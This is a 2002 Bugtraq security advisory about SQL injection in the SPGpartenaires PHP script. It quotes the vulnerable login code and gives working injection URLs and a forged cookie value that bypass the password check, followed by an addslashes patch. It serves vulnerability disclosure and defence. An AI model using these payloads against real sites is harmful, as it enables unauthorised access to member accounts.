Bugtraq mailing list archives
SPGpartenaires (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Fri, 20 Dec 2002 12:51:17 +0100
Informations : °°°°°°°°°°°°°° Version : ? -> 3.0.1 Website : http://www.scripts-php-gratuits.com Problem : SQL Injection -> Access to member's accounts PHP Code/Location : °°°°°°°°°°°°°°°°°°° modif/ident.php : -------------------------------------------------- [...]$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
$re=@mysql_db_query($db_name,$sql,$connect); $result=@mysql_fetch_array($re); if(empty($result[0])) { header("location: index.php?msg=Identification+incorrecte+!"); } else { setcookie("SPGP",$id."||".$pass,time()+84600,""); header("location: index2.php"); } [...] -------------------------------------------------- modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php : -------------------------------------------------------------- <? if(!isset($SPGP)) { header("location: index.php?msg=Veuillez+vous+identifier+!"); } else { $inf=explode("||",$SPGP); [...]$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
$re=@mysql_db_query($db_name,$sql,$connect); $result=@mysql_fetch_array($re); if(empty($result[0])) { header("location: index.php?msg=Veuillez+vous+identifier+!"); } [...] -------------------------------------------------------------- Exploits : °°°°°°°°°° http://[target]/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''=' or QUERY : ?SPGP=[ID]%7C%7C'%20OR%20''=' with : - modif/delete.php - modif/index2.php - modif/modif.php - modif/modif_suite.php Patch : °°°°°°° In modif/ident.php replace the line : ----------------------------------------------------------------$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
---------------------------------------------------------------- by : ---------------------------------------------------------------$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND motdepasse='".addslashes($pass)."'";
--------------------------------------------------------------- And in the other files replace the line : ---------------------------------------------------------------$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
--------------------------------------------------------------- by : ---------------------------------------------------------------$sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND motdepasse='".addslashes($inf[1])."'";
--------------------------------------------------------------- A patch can be found on http://www.phpsecure.org. More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/SPGpartenaires.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Current thread:
- SPGpartenaires (PHP) Frog Man (Dec 20)